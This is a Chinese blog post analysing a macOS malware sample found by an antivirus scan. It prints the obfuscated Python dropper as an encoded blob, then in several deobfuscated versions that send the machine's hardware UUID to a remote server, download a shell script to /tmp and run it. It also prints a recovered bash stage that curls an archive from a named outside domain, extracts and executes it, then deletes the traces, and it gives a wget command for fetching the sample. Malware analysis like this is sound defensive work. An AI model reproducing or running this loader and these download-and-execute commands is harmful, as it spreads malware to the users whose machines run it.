Mac App 破解之路八 病毒程序分析
本人使用MacBooster 7 扫出了几个未知程序.
JMJ56 这个程序. 在finder中打开发现是一个shell脚本 调用了python
9NKb0 就是python脚本使用. 只不过是编译之后的 pyc二进制文件.
使用 https://tool.lu/pyc/ 在线反编译工具, 将其反编译后,得到了如下代码:
import zlib
import base64
exec zlib.decompress(base64.b64decode('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'))
将exec 改成 print 后 得到源码:
import time
YCs=globals
YCQ=None
YCX=Exception
YCU=chr
YCf=ord
YCq=True
YCk=str
YCN=int
YCD=len
YCI=open
YCM=False
YCF=float
YCu=OSError
YCE=enumerate
Ycw=time.time
Ycb=time.sleep
import uuid
YcB=uuid.uuid4
import os
Yci=os.path
YcA=os.remove
Ycl=os.getenv
YCc=os.mkdir
import sys
YCp=sys.path
YCn=sys.argv
import platform
YCS=platform.mac_ver
import urllib2
YCL=urllib2.Request
YCy=urllib2.urlopen
import shelve
YCV=shelve.DbfilenameShelf
import base64
YCg=base64.b64decode
YCp.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
YCa=objc.loadBundleFunctions
from subprocess import Popen,PIPE
from Foundation import NSBundle
YCr=NSBundle.bundleWithIdentifier_
def YcP():
YcC=YCr('com.apple.framework.IOKit')
Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
YCa(YcC,YCs(),Ycp)
def YcK(WTRkc):
return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,YCQ,0)
def Yct():
return YcK("IOPlatformUUID")
def YcW(bmtzB):
pass
def YcH(YcF):
try:
Ycn=YCL(YcF)
YcS=YCy(Ycn)
YcL=YcS.read()
return YcL
except YCX as twwAy:
pass
def Ycz(mOoCz):
if Ycy:
return YcT(mOoCz)
return mOoCz
def YcT(bmtzB):
return YCg(YCg("".join([YCU(YCf(x)-1)for x in YCg(bmtzB)]))[::-1])
Ycy=YCq
class Ycx:
def __init__(Ycq):
YcP()
YcV=Ycz("UVUyU1ZsNTZTV04+")
Ycg=Ycz("TkVselpvbDZiWE9wWGtPTg==")
Yca=Ycz("UVUyU1hrS0hObVdwVm1pW1NVbVVbWW1IY1hPcWNGZVY=")
Ycr=Ycz("UVdHSVtHU2xXM0d1T1VLalNGNllYVjU2VjNXNlNuMmtiWHlJV0I+Pg==")
Ycs=Ycz("TkVtSVhoPj4=")
YcQ=Ycz("ZW1LSlhoPj4=")
YcX=Ycz("UVZXVltCPj4=")
YcU=Ycz("UVdtVltCPj4=")
Ycf=Ycz("UVUyQ1pZcDJSM1d4UFZPa2VHSntVQj4+")
Ycq.LyPiI=Ycz("UVZHWltCPj4=")
Ycq.bHJIV=Ycz("UVUyQ1pZcDZiWEt4VGtLTg==")
Ycq.RXatE=Ycz("UVhldVtSPj4=")
Ycq.jWCqZ=Ycz("UVhldltSPj4=")
Ycq.axruV=Ycz("UVZse1hSPj4=")
Ycq.PzAcW=Ycz("ZldxWlpoPj4=")
Yck=Ycz("UVZHRlVVU0tTRjk+")
Ycq.FlQzO=Ycz("UVUyU1VrR2tTRjE+")
Ycq.TdttD=Ycz("UVUyNFtCPj4=")
Ycq.skrNG=Ycz("UVhPRlVoPj4=")
Ycq.BnAQf=YCk(YcB()).split('-')[-1][2:6]
YcN=Ycl(YcV)
if YcN in[Ycg,YCQ]:
YcN=""
if Ycq.YcG():
Ycq.iQbym=Ycq.YcJ(Ycq.YcO(YcN,Ycr))
YcD=Ycq.YcJ(Ycq.YcO(Ycq.YcJ(Ycq.iQbym),YcQ))
YcI=Ycq.YcJ(YcU)
else:
Ycq.iQbym=Ycq.YcJ(Ycq.YcO(YcN,Yca))
YcD=Ycq.YcJ(Ycq.YcO(Ycq.YcJ(Ycq.iQbym),Ycs))
YcI=Ycq.YcJ(YcX)
Ycq.tJTBy=Ycq.YcJ(Ycf)
Ycq.tvkWA=Ycq.YcJ(Ycq.YcO(Ycq.YcJ(Ycq.iQbym),Ycq.YcJ(YcI)))
try:
Ycq.CRAQs=YCV(Ycq.YcJ(YcD))
except YCX as twwAy:
return
Ycq.axdjg=YCN(Yck)
def Ycm(Ycq):
Ycq.Yco()
if Ycq.Yce():
Ycq.Ych()
Ycq.CRAQs.close()
def Ych(Ycq):
if YCD(Ycq.CRAQs.get(Ycq.LyPiI,''))>0:
Ycq.YcR(Ycq.CRAQs[Ycq.LyPiI].strip())
else:
try:
f=YCI(Ycq.YcJ(Ycq.tvkWA))
YcM=f.readline()
f.close()
Ycq.CRAQs[Ycq.LyPiI]=YcM.strip()
if YCD(Ycq.CRAQs.get(Ycq.LyPiI,''))>0:
Ycq.YcR(Ycq.CRAQs[Ycq.LyPiI].strip())
else:
pass
except YCX as twwAy:
return
def YcR(Ycq,jfubJ):
YcF="{}{}&{}={}".format(jfubJ,Yct(),Ycq.PzAcW,YCS()[0])
YcL=YcH(YcF)
if not YcL:
return
if YCD(YcL)>10:
Ycq.Ycv(YcL)
def Ycv(Ycq,ToLzn):
Ycq.Ycj(ToLzn)
Ycq.Ycd()
try:
Ycb(2)
YcA(Ycq.YcJ(Ycq.tJTBy))
except YCX as twwAy:
pass
def Ycj(Ycq,ToLzn):
YcL=YcH(ToLzn)
try:
f=YCI(Ycq.YcJ(Ycq.tJTBy),Ycz(Ycq.TdttD))
f.write(YcL)
f.close()
except YCX as twwAy:
pass
def Ycd(Ycq):
p=Popen([Ycq.bHJIV,Ycq.YcJ(Ycq.tJTBy)],stdin=PIPE,stdout=PIPE,stderr=PIPE)
p.communicate()
def YcG(Ycq):
if YCD(YCn)>1:
if YCn[1]==Ycq.axruV:
return YCq
return YCM
def Yce(Ycq):
if YCN(Ycq.CRAQs.get(Ycq.RXatE,0))==0:
Ycq.CRAQs[Ycq.RXatE]=Ycw()
Ycq.CRAQs[Ycq.jWCqZ]=Ycw()
return YCq
if YCN(Ycq.CRAQs.get(Ycq.jWCqZ,0))>0:
if Ycw()-YCF(Ycq.CRAQs[Ycq.jWCqZ])<Ycq.axdjg:
return YCM
Ycq.CRAQs[Ycq.jWCqZ]=Ycw()
return YCq
def Yco(Ycq):
if not Yci.isdir(Ycq.YcJ(Ycq.iQbym)):
try:
YCc(Ycq.YcJ(Ycq.iQbym),YCN(Ycq.FlQzO))
except YCu as xQowg:
pass
except YCX as twwAy:
pass
def YcJ(Ycq,DngPJ):
return ''.join([YCU(YCf(JeEmF)^YCf(Ycq.BnAQf[JAYHL%YCD(Ycq.BnAQf)]))for JAYHL,JeEmF in YCE(YCk(DngPJ))])
def YcO(Ycq,*args):
Ycu=Ycq.skrNG
try:
Ycu=YCN(Ycu)
except YCX as twwAy:
Ycu=YCN(Ycz(Ycq.skrNG))
return YCU(Ycu).join(args)
YcE=Ycx()
YcE.Ycm()
看到这样的代码,有点尴尬, 混淆过后的python真牛逼. 手动优化一番后:
import time
import uuid
import os
import sys
import platform
import urllib2
import shelve
import base64 sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
from subprocess import Popen,PIPE
from Foundation import NSBundle def YcP():
YcC=NSBundle.bundleWithIdentifier_('com.apple.framework.IOKit')
Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
objc.loadBundleFunctions(YcC,globals(),Ycp) def YcK(WTRkc):
return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,None,0)
def Yct():
return YcK("IOPlatformUUID")
def YcW(bmtzB):
pass
def YcH(YcF):
try:
Ycn=urllib2.Request(YcF)
YcS=urllib2.urlopen(Ycn)
YcL=YcS.read()
return YcL
except Exception as twwAy:
pass
def Ycz(mOoCz):
if True:
return YcT(mOoCz)
return mOoCz def YcT(bmtzB):
return base64.b64decode(base64.b64decode("".join([chr(ord(x)-1)for x in base64.b64decode(bmtzB)]))[::-1]) class Ycx:
def __init__(self):
YcP()
YcV=Ycz("UVUyU1ZsNTZTV04+")
Ycg=Ycz("TkVselpvbDZiWE9wWGtPTg==")
Yca=Ycz("UVUyU1hrS0hObVdwVm1pW1NVbVVbWW1IY1hPcWNGZVY=")
Ycr=Ycz("UVdHSVtHU2xXM0d1T1VLalNGNllYVjU2VjNXNlNuMmtiWHlJV0I+Pg==")
Ycs=Ycz("TkVtSVhoPj4=")
YcQ=Ycz("ZW1LSlhoPj4=")
YcX=Ycz("UVZXVltCPj4=")
YcU=Ycz("UVdtVltCPj4=")
Ycf=Ycz("UVUyQ1pZcDJSM1d4UFZPa2VHSntVQj4+")
self.LyPiI=Ycz("UVZHWltCPj4=")
self.bHJIV=Ycz("UVUyQ1pZcDZiWEt4VGtLTg==")
self.RXatE=Ycz("UVhldVtSPj4=")
self.jWCqZ=Ycz("UVhldltSPj4=")
self.axruV=Ycz("UVZse1hSPj4=")
self.PzAcW=Ycz("ZldxWlpoPj4=")
Yck=Ycz("UVZHRlVVU0tTRjk+")
self.FlQzO=Ycz("UVUyU1VrR2tTRjE+")
self.TdttD=Ycz("UVUyNFtCPj4=")
self.skrNG=Ycz("UVhPRlVoPj4=")
self.BnAQf=str(uuid.uuid4()).split('-')[-1][2:6]
YcN=os.getenv(YcV)
if YcN in[Ycg,None]:
YcN=""
if self.YcG():
self.iQbym=self.YcJ(self.YcO(YcN,Ycr))
YcD=self.YcJ(self.YcO(self.YcJ(self.iQbym),YcQ))
YcI=self.YcJ(YcU)
else:
self.iQbym=self.YcJ(self.YcO(YcN,Yca))
YcD=self.YcJ(self.YcO(self.YcJ(self.iQbym),Ycs))
YcI=self.YcJ(YcX)
self.tJTBy=self.YcJ(Ycf)
self.tvkWA=self.YcJ(self.YcO(self.YcJ(self.iQbym),self.YcJ(YcI)))
try:
self.CRAQs=shelve.DbfilenameShelf(self.YcJ(YcD))
except Exception as twwAy:
return
self.axdjg=int(Yck)
def Ycm(self):
self.Yco()
if self.Yce():
self.Ych()
self.CRAQs.close()
def Ych(self):
if len(self.CRAQs.get(self.LyPiI,''))>0:
self.YcR(self.CRAQs[self.LyPiI].strip())
else:
try:
f=open(self.YcJ(self.tvkWA))
YcM=f.readline()
f.close()
self.CRAQs[self.LyPiI]=YcM.strip()
if len(self.CRAQs.get(self.LyPiI,''))>0:
self.YcR(self.CRAQs[self.LyPiI].strip())
else:
pass
except Exception as twwAy:
return
def YcR(self,jfubJ):
YcF="{}{}&{}={}".format(jfubJ,Yct(),self.PzAcW,platform.mac_ver()[0])
YcL=YcH(YcF)
if not YcL:
return
if len(YcL)>10:
self.Ycv(YcL)
def Ycv(self,ToLzn):
self.Ycj(ToLzn)
self.Ycd()
try:
time.sleep(2)
os.remove(self.YcJ(self.tJTBy))
except Exception as twwAy:
pass
def Ycj(self,ToLzn):
YcL=YcH(ToLzn)
try:
f=open(self.YcJ(self.tJTBy),Ycz(self.TdttD))
f.write(YcL)
f.close()
except Exception as twwAy:
pass
def Ycd(self):
p=Popen([self.bHJIV,self.YcJ(self.tJTBy)],stdin=PIPE,stdout=PIPE,stderr=PIPE)
p.communicate()
def YcG(self):
if len(sys.argv)>1:
if sys.argv[1]==self.axruV:
return True
return False
def Yce(self):
if int(self.CRAQs.get(self.RXatE,0))==0:
self.CRAQs[self.RXatE]=time.time()
self.CRAQs[self.jWCqZ]=time.time()
return True
if int(self.CRAQs.get(self.jWCqZ,0))>0:
if time.time()-float(self.CRAQs[self.jWCqZ])<self.axdjg:
return False
self.CRAQs[self.jWCqZ]=time.time()
return True
def Yco(self):
if not os.path.isdir(self.YcJ(self.iQbym)):
try:
os.mkdir(self.YcJ(self.iQbym),int(self.FlQzO))
except OSError as xQowg:
pass
except Exception as twwAy:
pass
def YcJ(self,DngPJ):
return ''.join([chr(ord(JeEmF)^ord(self.BnAQf[JAYHL%len(self.BnAQf)]))for JAYHL,JeEmF in enumerate(str(DngPJ))])
def YcO(self,*args):
Ycu=self.skrNG
try:
Ycu=int(Ycu)
except Exception as twwAy:
Ycu=int(Ycz(self.skrNG))
return chr(Ycu).join(args) YcE=Ycx()
YcE.Ycm()
上面的代码稍微还可以看一下. 继续优化:
# -*- coding: utf-8 -*-
# @Time : 2019/8/4 8:13 PM
# @Author : dzq
import time
import uuid
import os
import sys
import platform
import urllib2
import shelve
import base64 sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
from subprocess import Popen,PIPE
from Foundation import NSBundle def YcP():
YcC=NSBundle.bundleWithIdentifier_('com.apple.framework.IOKit')
Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
objc.loadBundleFunctions(YcC,globals(),Ycp) def YcK(WTRkc):
return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,None,0)
def Yct():
return YcK("IOPlatformUUID")
def YcW(bmtzB):
pass def reqUrl(YcF):
try:
Ycn=urllib2.Request(YcF)
YcS=urllib2.urlopen(Ycn)
con=YcS.read()
return con
except Exception as twwAy:
pass
def Ycz(mOoCz):
if True:
return YcT(mOoCz)
return mOoCz def YcT(bmtzB):
return base64.b64decode(base64.b64decode("".join([chr(ord(x)-1)for x in base64.b64decode(bmtzB)]))[::-1]) class Ycx:
def __init__(self):
YcP()
YcV='HOME'
Ycg='/var/root'
Ycr='Library/MacConfigStd'
Ycs='dot'
YcX='u1'
YcU='u6'
Ycf='/tmp/ix.sh'
self.bHJIV='/bin/sh'
self.axruV='cr'
self.PzAcW='mvr'
self.TdttD='w'
self.BnAQf='e2f4' if self.YcG():
self.iQbym= '/Users/dengzhongqiang/Library/MacConfigStd'
YcD= '/Users/dengzhongqiang/Library/MacConfigStd/dto'
YcI= 'u6'
else:
self.iQbym= '/Users/dengzhongqiang/Library/DataSave'
YcD= '/Users/dengzhongqiang/Library/DataSave/dot'
YcI = 'u1' self.tvkWA=self.path_join(self.iQbym, YcI) try:
self.CRAQs=shelve.DbfilenameShelf(YcD)
except Exception as twwAy:
return def Ycm(self):
self.Yco()
if self.Yce():
self.Ych()
self.CRAQs.close() def Ych(self):
if len(self.CRAQs.get('up',''))>0:
self.req(self.CRAQs['up'].strip())
else:
try:
f=open('/Users/dengzhongqiang/Library/DataSave/u1')
line=f.readline()
f.close()
self.CRAQs['up']=line.strip()
if len(self.CRAQs.get('up',''))>0:
self.req(self.CRAQs['up'].strip())
else:
pass
except Exception as twwAy:
return def req(self,jfubJ):
YcF="{}{}&{}={}".format(jfubJ,Yct(),'mvr',platform.mac_ver()[0])
con=reqUrl(YcF)
if not con:
return
if len(con)>10:
self.Ycv(con) def Ycv(self,url):
self.Ycj(url)
self.Ycd()
try:
time.sleep(2)
os.remove(self.YcJ('/tmp/ix.sh'))
except Exception as twwAy:
pass def Ycj(self,url):
con=reqUrl(url)
try:
f=open('/tmp/ix.sh',"w")
f.write(con)
f.close()
except Exception as twwAy:
pass def Ycd(self):
p=Popen(['bib/sh','/tmp/ix.sh'],stdin=PIPE,stdout=PIPE,stderr=PIPE)
p.communicate() def YcG(self):
if len(sys.argv)>1:
if sys.argv[1]==self.axruV:
return True
return False
def Yce(self):
if int(self.CRAQs.get('zh',0))==0:
self.CRAQs['zh']=time.time()
self.CRAQs['zx']=time.time()
return True
if int(self.CRAQs.get('zx',0))>0:
if time.time()-float(self.CRAQs['zx'])< 82800:
return False
self.CRAQs['zx']=time.time()
return True
def Yco(self):
if not os.path.isdir('/Users/dengzhongqiang/Library/DataSave'):
try:
os.mkdir( self.iQbym,0755)
except OSError as xQowg:
pass
except Exception as twwAy:
pass def path_join(self,*args):
return '/'.join(args) YcE=Ycx()
YcE.Ycm()
# -*- coding: utf-8 -*-
# @Time : 2019/8/4 8:13 PM
# @Author : dzq
import time
import uuid
import os
import sys
import platform
import urllib2
import shelve
import base64 sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
from subprocess import Popen,PIPE
from Foundation import NSBundle def YcP():
YcC=NSBundle.bundleWithIdentifier_('com.apple.framework.IOKit')
Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
objc.loadBundleFunctions(YcC,globals(),Ycp) def YcK(WTRkc):
return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,None,0)
def Yct():
return YcK("IOPlatformUUID")
def YcW(bmtzB):
pass def reqUrl(YcF):
try:
Ycn=urllib2.Request(YcF)
YcS=urllib2.urlopen(Ycn)
con=YcS.read()
return con
except Exception as twwAy:
pass
def Ycz(mOoCz):
if True:
return YcT(mOoCz)
return mOoCz def YcT(bmtzB):
return base64.b64decode(base64.b64decode("".join([chr(ord(x)-1)for x in base64.b64decode(bmtzB)]))[::-1]) class Ycx:
def __init__(self):
YcP() if self.YcG():
self.iQbym= '/Users/dengzhongqiang/Library/MacConfigStd'
YcD= '/Users/dengzhongqiang/Library/MacConfigStd/dto'
YcI= 'u6'
else:
self.iQbym= '/Users/dengzhongqiang/Library/DataSave'
YcD= '/Users/dengzhongqiang/Library/DataSave/dot'
YcI = 'u1' self.tvkWA=self.path_join(self.iQbym, YcI) try:
self.CRAQs=shelve.DbfilenameShelf(YcD)
except Exception as twwAy:
return def Ycm(self):
self.Yco()
if self.Yce():
self.Ych()
self.CRAQs.close() def Ych(self):
if len(self.CRAQs.get('up',''))>0:
self.req(self.CRAQs['up'].strip())
else:
try:
f=open('/Users/dengzhongqiang/Library/DataSave/u1')
line=f.readline()
f.close()
self.CRAQs['up']=line.strip()
if len(self.CRAQs.get('up',''))>0:
self.req(self.CRAQs['up'].strip())
else:
pass
except Exception as twwAy:
return def req(self,jfubJ):
YcF="{}{}&{}={}".format(jfubJ,Yct(),'mvr',platform.mac_ver()[0])
con=reqUrl(YcF)
if not con:
return
if len(con)>10:
self.Ycv(con) def Ycv(self,url):
self.Ycj(url)
self.Ycd()
try:
time.sleep(2)
os.remove(self.YcJ('/tmp/ix.sh'))
except Exception as twwAy:
pass def Ycj(self,url):
con=reqUrl(url)
try:
f=open('/tmp/ix.sh',"w")
f.write(con)
f.close()
except Exception as twwAy:
pass def Ycd(self):
p=Popen(['bib/sh','/tmp/ix.sh'],stdin=PIPE,stdout=PIPE,stderr=PIPE)
p.communicate() def YcG(self):
if len(sys.argv)>1:
if sys.argv[1]=='cr':
return True
return False def Yce(self):
if int(self.CRAQs.get('zh',0))==0:
self.CRAQs['zh']=time.time()
self.CRAQs['zx']=time.time()
return True
if int(self.CRAQs.get('zx',0))>0:
if time.time()-float(self.CRAQs['zx'])< 82800:
return False
self.CRAQs['zx']=time.time()
return True
def Yco(self):
if not os.path.isdir('/Users/dengzhongqiang/Library/DataSave'):
try:
os.mkdir( self.iQbym,0755)
except OSError as xQowg:
pass
except Exception as twwAy:
pass def path_join(self,*args):
return '/'.join(args) YcE=Ycx()
YcE.Ycm()
通过调试和进一步优化,读取这段逻辑, 知道了这段恶意程序的思想:
每次开机执行这段脚本, 读取dot.db, 转换成python中的字典 data. [这里有一个时间比对, 如果时间在23个小时以内,则不请求URL
这个URL的功能就是获取ix.sh文件内容.]
然后获取这个data中up字段,如果没有up字段,就读取/Users/dengzhongqiang/Library/DataSave/u1文件内容:
是一个url, 然后请求这个URL, 如果返回的数据长度大于10, 则把这个内容写入到 /tmp/ix.sh中,
并加入可执行权限,然后执行. 执行完成之后过2秒就删除这个ix.sh脚本.
完整的请求地址是:
http://i.swiftinstaller.top/c/ci?ct=clpy&tm=1&id=7B97AA40-7A19-5F8C-B050-35A7D8D8F8B3&mvr=10.14.5
id字段是这段代码的返回值,
IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),'IOPlatformUUID',None,0)
妈个逼的, 用postman模拟请求一直返回1, 很想知道iv.sh里的内容是啥. 决定用数据恢复软件恢复一波,看能不能找回来. 看一下恶意程序的真荣.
拿到了iv.sh的内容.
#!/bin/bash
/usr/bin/curl -s -L -o /var/tmp/xSf.tgz "http://www.qaeqxa.pw/static/s3/exec6625/exec.tgz"
mkdir -p /var/tmp/xSf
tar -xzf /var/tmp/xSf.tgz -C /var/tmp/xSf/
cd /var/tmp/xSf/
./xSf func_cccc(){
sleep
rm -rf /var/tmp/xSf
rm -rf /var/tmp/xSf.tgz
}
func_cccc &
可以知道, 它下载了exec.tgz, 下载我执行命令下载一下这个.
wget http://www.qaeqxa.pw/static/s3/exec6625/exec.tgz
tar -xzf exec.tgz -C ./bingdu/
拿到了真正的病毒程序: xSf
这个程序隐藏的真深, 延时120秒后就删除了. 杀毒软件肯定也就找不到它了.
用杀毒软件直接扫描这个程序: 
最终找到了写病毒的人,他叫: batman
老子要报警.
Mac App 破解之路八 病毒程序分析的更多相关文章
- Mac app 破解之路
6年之前一直做过一些内存挂,脚本挂.都是比较低级的技术. 这几年期间,断断续续利用业余时间学了一些汇编的知识,当时只是想着破解游戏. 所有的黑技术都是业余自学的,没有老师可以问,只能百度和自己领悟,比 ...
- mac App 破解之路六 studio 3t
不想无限使用,直接破解到正版: 输入邮箱 名字之后 还有licence信息之后,处理函数是: this.text.getText() 很明显是你输入的licence. 然后交给父类okPress处 ...
- Mac App破解之路九 vscode插件破解
破解对象: luaide 破解目的:学习如何破解vscode插件 破解背景: vsscode用了这么多年,安装了很多插件,其中luaide插件是收费的. 说实话,100块并不贵, 我本来准备买的. ...
- MAC App破解之路十 Particle Design
这个软件破解非常简单: 修改: [PaddleStatic Yz6nrtNwF4].直接返回1 效果:
- Ios App破解之路二 JJ斗地主
前提条件: 越狱手机里, 安装了 <JJ斗地主> 使用砸壳工具clutch 下载地址: https://github.com/KJCracks/Clutch/releases dzq:~/ ...
- IOS App破解之路一 拿到appstore上的ipa
1, 在Mac电脑上的app store里搜索Apple Configurator2 并安装 2, iPhone手机连接Mac电脑 3, 登录Apple Configurator2 菜单栏, 账号 ...
- 【APP设计利器】Sketch 41 Mac中文破解版(含汉化插件)
Sketch是一款拥有美观界面和强大功能适用于所有设计师的专业矢量绘图工具.它旨在为美术设计师创造出一款更优秀的作品,不是复制品,而是提升品.Sketch简约的设计是基于无限的规模和层次的绘图空间,免 ...
- Navicat Premium Mac 12 破解(亲测可用!!!)
今天不知怎的,出于强迫症的我就是要强行搞个Navicat Premium Mac 12 破解版本. 历经了种种种种种种磨难与艰辛与火海,终于破解成功了. 因为要经常使用MySQL,使用命令行那是相当的 ...
- 破解安装 SecureCRT 7.0.2 for mac完美破解版,mac secureCRT , apple secureCRT
mac secureCRT , apple secureCRT 下载地址:http://download.csdn.net/detail/guolichun/7733069 破解安装 SecureC ...
随机推荐
- Vue 更换页面图标和title
1.基础的做法就是直接换掉,logo换的时候需要使用icon格式的图标 title 直接在index.html 里面把原来的title注释掉 或者直接改了就行 2. 如果需要进行相应的改变啥的 ,需要 ...
- 【Ubuntu】Ubuntu18.04通过重装系统成功安装显卡驱动
0. 前言 前面用了一天的时间来解决Ubuntu安装显卡驱动出现的用户输入密码登录后出现的紫屏.循环登录的问题,过程可阅读“[Ubuntu]Ubuntu系统启动过程中,输入用户名与密码后登录一直卡在紫 ...
- [COCOS2DX-LUA]0-005.cocos2dx中关于全面屏和折叠屏的适配的一些见解
1.随着科技的发展,我们可以看到从iphoneX的刘海屏开始,引发了各种全面屏和异形屏的出现.这是科技的进步,但是对于各大的应用厂商来说,苦不堪言. 2.当然 ,吐槽归吐槽,我们还是要理智的去对待这个 ...
- 软件攻城狮究级装B指南
引言 装B于无形,随性而动,顺道而行,待霸业功成之时,你会发现:装B是牛B最好的的试金石. -- SuperDo 第一章.人间兵器(准备工具) <论语·魏灵公>:“工欲善其事,必先利其器. ...
- Linux 任务后台运行软件【即:终端复用器】之---screen
会话: 命令行的典型使用方式是,打开一个终端窗口(terminal window,以下简称"窗口"),在里面输入命令. 用户与计算机的这种临时的交互,称为一次"会话&qu ...
- Java中的集合(十五) Iterator 和 ListIterator、Enumeration
Java中的集合(十五) Iterator 和 ListIterator.Enumeration 一.Iterator (一).简介 Iterator 是一个接口,它是集合的迭代器.集合可以通过Ite ...
- BFC与优雅降级 渐进增强——学习笔记
BFC(块级格式化上下文) BFC(Block formatting context) 直译为"块级格式化上下文". 元素的显示模式 我们前面讲过 元素的显示模式 display. ...
- [leetcode] 并查集(Ⅱ)
最长连续序列 题目[128]:链接. 解题思路 节点本身的值作为节点的标号,两节点相邻,即允许合并(x, y)的条件为x == y+1 . 因为数组中可能会出现值为 -1 的节点,因此不能把 root ...
- Blazor WebAssembly 修仙之途 - 组件与数据绑定
一.前言 在第一篇文章中,有提到过组件(Component)这个概念.组件在 Blazor 中是必不可少的,UI 全靠它组装起来,和前端的 JS 组件是一个意思,比如:vue component.re ...
- Rocket - util - MultiWidthFifo
https://mp.weixin.qq.com/s/CUnrpyQN5LRBR5bxC5u86A 简单介绍MultiWidthFifo的实现. 1. 基本介绍 实现一个输入宽度 ...